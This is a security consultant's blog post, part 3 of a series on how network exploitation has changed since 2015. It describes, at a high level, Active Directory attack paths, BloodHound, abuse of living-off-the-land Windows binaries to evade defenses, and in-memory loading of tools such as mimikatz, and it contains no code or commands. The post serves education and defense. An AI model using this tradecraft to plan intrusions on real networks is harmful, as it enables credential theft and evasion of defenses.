Blog Series: Exploitations, Penetration Testing, and Modern Cybersecurity Defenses Evolution of Exploitation, Part 3: 2015+
By Luke Willadsen
BLUF: This blog series is written to provide an anecdotal history of the evolution of exploitation in cybersecurity, focused largely on network exploitations in an enterprise and couched as Luke’s perspective over his decade-long career in InfoSec.
In the field of cybersecurity, there’s one constant: It’s a game of cat-and-mouse. As exploits and vulnerabilities evolve, so too do vendors and defenders. While the first half of the 2010s are remembered by excessive buffer overflow attacks and the rise in the use of PowerShell-based remote execution techniques, the remainder of the decade featured new and “improved” ways to perform network exploitation.
Active directory (AD) exploitation and privilege abuse wasn’t in anyway a new concept, but until the mid-2010s it wasn’t a priority technique. This is likely because of two things: a.) offensive security specialists were overthinking it, and b.) less complicated techniques worked just fine. Active directory exploitation can be quite complicated, and involve many steps in the attack path to obtain Admin’s privileges, but the exploits used remain relatively rudimentary. Here’s an example:
Say our goal is to get on Admin’s system, but we only have employee Steve’s credentials. We would try to use Steve’s credentials to get on a system that Admin is logged into and steal Admin’s creds from there. This is a two-step attack. To find out this information we would query the AD domain controller and ask it questions about its users, groups’ computers, permissions, and more. Note: there was rarely a two-step attack path to getting Admin's privileges. Instead, oftentimes the attack ballooned into five- or ten-step attacks. Phish onto Mary’s system, use Mary’s credentials to log into a system that allows all domain users administrative access, from that system grab Dave’s credentials. Use Dave’s credentials to log into Joe’s system. Use Joe’s credentials to dump a database containing Steve’s password hash. Crack Steve’s password hash. Use the password to log into Admin’s computer and steal Admin’s credentials.
So you might have some questions – like why is Dave able to log into Joe’s system? Why is Steve able to log into Admin’s system? The answer is, there is no good answer. They shouldn’t be able to. But they ARE able to. How or why does this happen? Well, when you’re an IT administrator tasked with managing 10,000 users and computers, the administrative burden is so great that little mistakes slip through the cracks. We call these misconfigurations. Maybe Joe’s computer used to be Dave’s, and when it was reassigned to Joe, the administrators forgot to remove Dave’s permissions on it.
These mistakes are inevitable, and exploiting them became even easier with the release of a tool called BloodHound. BloodHound allows the user to automatically map these misconfigurations and view complex attack paths that are strictly based on poorly configured Active Directory privileges and unintended relationships in AD. BloodHound leverages graph theory to help us visualize these attack paths, enabling attackers to conceptualize and map long chains of attack paths that wouldn’t really be possible through manual enumeration of AD. Just because something is in the attack path doesn’t mean it’s possible to exploit. Techniques such as a man-in-the-middle attack (to gain some encrypted credentials), hijack and redirect a valid authentication request (to get a session on a system), network scanning (to look for resources that I can access without authenticating), and others may still need to be leveraged in order to go from no credentials or low-privilege credentials to Admin.
With the current status of our game of cat-and-mouse, some defenders have been quite keen to respond to and protect themselves from these more basic attacks. As such, hackers have changed tactics again in the last few years. Rather than having a specific go-to for getting a RAT running on a victim machine, many hackers have become more agnostic in how they pursue and achieve code execution. Lately that has involved analyzing the endpoint security product, and any other defensive countermeasures, and then relying on a native windows binary to execute my tools.
A project called Living off the Land Binaries and Scripts (lolbas) documents the usage and functionality of 119 windows binaries that we can leverage to gain code execution. These binaries, if not properly monitored, allow us to bypass application whitelisting, UAC, AMSI, and more depending on the nature and use of the binary. Once we have code injection, many of us are either performing reflective DLL injection or are leveraging C# and dotnet to get our RATs to execute what we call assemblies within the context of our running process. Rather than put down a new executable, DLL, or script for each capability we want to execute on victim machines (such as mimikatz) we can just load it straight into memory and run it. Many of these ready-to-go assemblies can be easily found on GitHub.
Stay on standby for the conclusion for this exploitation series, coming soon.
About the Author: Luke Willadsen, Technical Services Lead, EmberSec, is an InfoSec professional and white hat hacker. After getting his start with the Dept. of Defense in 2010, Luke leveraged his specialization in offensive security and eventually turned to private and public sector consulting. Mr. Willadsen has a bachelor’s degree in cybersecurity, a master’s degree in technology studies, an OSCP certification, and a CISSP certification. Outside of his professional life, Luke is a husband, an animal lover, a fitness enthusiast and a passable guitar player, plays a bard in Dungeons and Dragons, and enjoys playing a few rounds of Battlefield on my PS4 a night or two a week.
About EmberSec: EmberSec, a Division of By Light, serves as a provider of advanced, technical cybersecurity services and solutions. Whether that's testing the maturity and efficiency of your security program through technical assessments, integrating highly customized Managed Detection & Response capabilities, or aligning your infrastructure and security practices around industry frameworks, EmberSec understands the complexities involved in establishing a truly secure enterprise.
The EmberSec team is comprised of senior security researchers, operators, and intelligence professionals, and specializes in the following domains: